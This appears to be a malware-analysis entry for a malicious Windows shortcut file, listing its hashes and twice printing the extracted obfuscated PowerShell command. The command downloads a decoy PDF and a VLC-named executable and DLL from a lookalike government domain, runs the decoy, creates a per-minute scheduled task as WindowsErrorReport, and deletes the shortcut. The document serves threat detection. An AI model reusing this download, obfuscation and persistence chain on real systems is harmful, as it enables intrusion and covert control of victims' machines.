|
Hash | Hash Value |
|---|---|
| MD5 | 82adec72e5647afee39412bfbcbed71f
|
| Sha1 | cc6d561855e59fb2ea4a54af755156a8fa15944d
|
| Sha256 | 79192cba1c7037e1fe15dbf50bb2b3a96e53a85fbcbd2ce229af0efacdcb73c7
|
| Sha384 | 420fcaeef39914f8078366d2acdbb510044d9065a82e8bd6ce4c925917320a4998c050b7e2efe36a61b52730afa0241b
|
| Sha512 | 8fb566dcae33e8f3e4658fab2323e01ac6bf9b399c23adcd869dccea58155ee2ea2a1f5b99a5589f98e2e313af1c20e7df57f0418ee652676d038740b34c1de0
|
| SSDeep | 96:8orXYOx39zkJWTXzkedKzkFISyosJY1um3YLq:8orXYWNQJWTXQpQofY1jI
|
| TLSH | 1D919F1417E50224F3F75F7D68FA62615C3A7D9EEE218D9D01A0D1880C61A25ECB6F2F
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe $ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';iw''r $a//cabinetdivisionpakgov.org/download/fetch/list8/11712/view/a04fc0f4-c440-490f-b2a6-41e5b48c8f60 -OutFile $b\Public\Suspected_Internal_Fraud.pdf;s''ap''s $b\Public\Suspected_Internal_Fraud.pdf;iw''r $a//cabinetdivisionpakgov.org/download/fetch/list14/26119/view/57319199-3932-42cc-ae5e-76aa1d7f0bca -Outfile $c\Tasks\lama;r''e''n -Path $c\Tasks\lama -NewName $c\Tasks\vlc.exe;iw''r $a//cabinetdivisionpakgov.org/download/fetch/list13/37534/view/b2ab62a5-d4f9-42c7-ab98-96299e773a03 -Outfile $c\Tasks\lake;r''e''n -Path $c\Tasks\lake -NewName $c\Tasks\libvlc.dll;c''p''i $b\Public\Suspected_Internal_Fraud.pdf -destination .;&(g''cm sch*) /c''r''e''a''te /S''c minute /''t''n WindowsErrorReport /t''r $c\Tasks\vlc /f;e''r''a''s''e *d.?n? |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe $ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';iw''r $a//cabinetdivisionpakgov.org/download/fetch/list8/11712/view/a04fc0f4-c440-490f-b2a6-41e5b48c8f60 -OutFile $b\Public\Suspected_Internal_Fraud.pdf;s''ap''s $b\Public\Suspected_Internal_Fraud.pdf;iw''r $a//cabinetdivisionpakgov.org/download/fetch/list14/26119/view/57319199-3932-42cc-ae5e-76aa1d7f0bca -Outfile $c\Tasks\lama;r''e''n -Path $c\Tasks\lama -NewName $c\Tasks\vlc.exe;iw''r $a//cabinetdivisionpakgov.org/download/fetch/list13/37534/view/b2ab62a5-d4f9-42c7-ab98-96299e773a03 -Outfile $c\Tasks\lake;r''e''n -Path $c\Tasks\lake -NewName $c\Tasks\libvlc.dll;c''p''i $b\Public\Suspected_Internal_Fraud.pdf -destination .;&(g''cm sch*) /c''r''e''a''te /S''c minute /''t''n WindowsErrorReport /t''r $c\Tasks\vlc /f;e''r''a''s''e *d.?n? Malicious |
82adec72e5647afee39412bfbcbed71f |